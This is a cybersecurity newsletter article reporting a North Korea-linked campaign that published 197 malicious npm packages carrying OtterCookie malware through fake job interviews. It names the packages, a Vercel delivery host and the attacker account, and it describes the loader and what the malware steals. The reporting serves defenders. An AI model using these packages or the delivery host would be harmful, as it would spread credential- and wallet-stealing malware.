In partnership with
CYBER SYRUP
Delivering the sweetest insights on cybersecurity.
Trusted by millions. Actually enjoyed by them too.
Morning Brew makes business news something you’ll actually look forward to — which is why over 4 million people read it every day.
Sure, the Brew’s take on the news is witty and sharp. But the games? Addictive. You might come for the crosswords and quizzes, but you’ll leave knowing the stories shaping your career and life.
Try Morning Brew’s newsletter for free — and join millions who keep up with the news because they want to, not because they have to.
North Korean “Contagious Interview” Campaign Floods npm With Nearly 200 New Malicious Packages
Security researchers report that North Korea–aligned threat actors behind the Contagious Interview campaign have published 197 additional malicious npm packages, bringing the total into one of the largest ongoing package ecosystem abuse campaigns to date. The new packages—downloaded more than 31,000 times—deliver an evolved variant of OtterCookie, a cross-platform malware family that blends capabilities from both OtterCookie and BeaverTail. The campaign targets developers, job seekers, and individuals lured into fraudulent hiring pipelines.
Context
The Contagious Interview campaign weaponizes:
Fake job interviews
Malicious coding assessments
npm package poisoning
Developer-focused social engineering
Crypto-centric workflows
North Korean threat groups have repeatedly targeted software engineers, blockchain developers, and individuals connected to cryptocurrency projects. npm is an attractive delivery channel due to its enormous install base and dependency chain complexity.
Cisco Talos and others previously documented infections linked to fake recruitment processes where victims were tricked into running Node.js applications that deployed OtterCookie.
What Happened
Socket researchers identified 197 new npm packages tied to the campaign, including:
bcryptjs-node
cross-sessions
json-oauth
node-tailwind
react-adparser
session-keeper
tailwind-magic
tailwindcss-forms
webpack-loadcss
These packages pose as legitimate developer utilities but contain loader code designed to retrieve OtterCookie from a dedicated delivery infrastructure.
The packages connect to a hard-coded Vercel URL (tetrismic.vercel.app) that fetches the payload from a GitHub repository controlled by the attackers. The GitHub account stardev0914 has since been removed.
Technical Breakdown
Loader Behavior
Once executed, the malicious npm package:
Evades sandboxes and virtual machines
Profiles the host system
Retrieves cross-platform OtterCookie
Establishes a command-and-control (C2) session
Provides attackers a remote shell
OtterCookie Capabilities
The malware supports:
Clipboard theft
Keylogging
Screenshot capture
Credential harvesting
Cryptocurrency wallet and seed phrase theft
Browser data exfiltration
Document collection
The C2 communication fetches instructions from the attacker’s servers and maintains persistent control.
Evolving Tradecraft
Researchers note significant overlap between OtterCookie and BeaverTail, suggesting the threat actors are merging toolsets across campaigns to optimize their operations.
The campaign parallels another DPRK-linked effort, ClickFake Interview, which distributes GolangGhost (FlexibleFerret/WeaselStore) via fake assessment websites. This malware disguises itself as camera/microphone troubleshooting tools and deploys:
A Go-based RAT
macOS LaunchAgent persistence
A decoy Chrome camera prompt
A fake Chrome password screen that steals victims’ credentials to Dropbox
Impact Analysis
This campaign targets individuals rather than enterprises, focusing on:
Developers completing coding tests
Applicants in simulated interview environments
Users who install npm packages without scrutiny
The stolen data—browser credentials, wallet seeds, documents, keystrokes—directly supports financial theft and long-term espionage.
npm ecosystems remain vulnerable to:
Package typosquatting
Dependency chain poisoning
Social engineering targeting developers
Given more than 31,000 downloads, exposure is widespread and global.
Why It Matters
This is not a supply-chain operation targeting a single company—it’s a mass recruitment-themed attack pipeline designed to compromise individuals connected to high-value sectors. The campaign shows:
DPRK threat actors have deeply adapted to modern JavaScript workflows
npm remains a heavily abused ecosystem
Developer-focused attacks are increasing
Social engineering + malware delivery is a persistent DPRK pattern
Unlike their IT worker impersonation schemes, Contagious Interview aims directly at individuals through staged hiring processes.
Expert Commentary
Researcher Kirill Boychenko emphasizes the campaign’s scale, noting its “prolific exploitation of npm” and its alignment with JavaScript and crypto-centric developer habits.
Validin analysts clarify that this campaign is distinct from broader DPRK IT worker infiltration:
Instead of placing operatives inside companies, Contagious Interview weaponizes the job application process itself, using malicious assessments and fraudulent platforms to compromise victims.
Key Takeaways
197 new malicious npm packages linked to DPRK actors.
31,000+ downloads delivering updated OtterCookie malware.
Loader packages connect to Vercel-hosted infrastructure to fetch payloads.
Malware supports keylogging, clipboard theft, screenshot capture, credential harvesting, and crypto wallet theft.
Campaign overlaps with ClickFake Interview and GolangGhost malware.
Attackers exploit fake job interviews and developer workflows.
npm remains a major distribution channel for supply-chain and social-engineering driven attacks.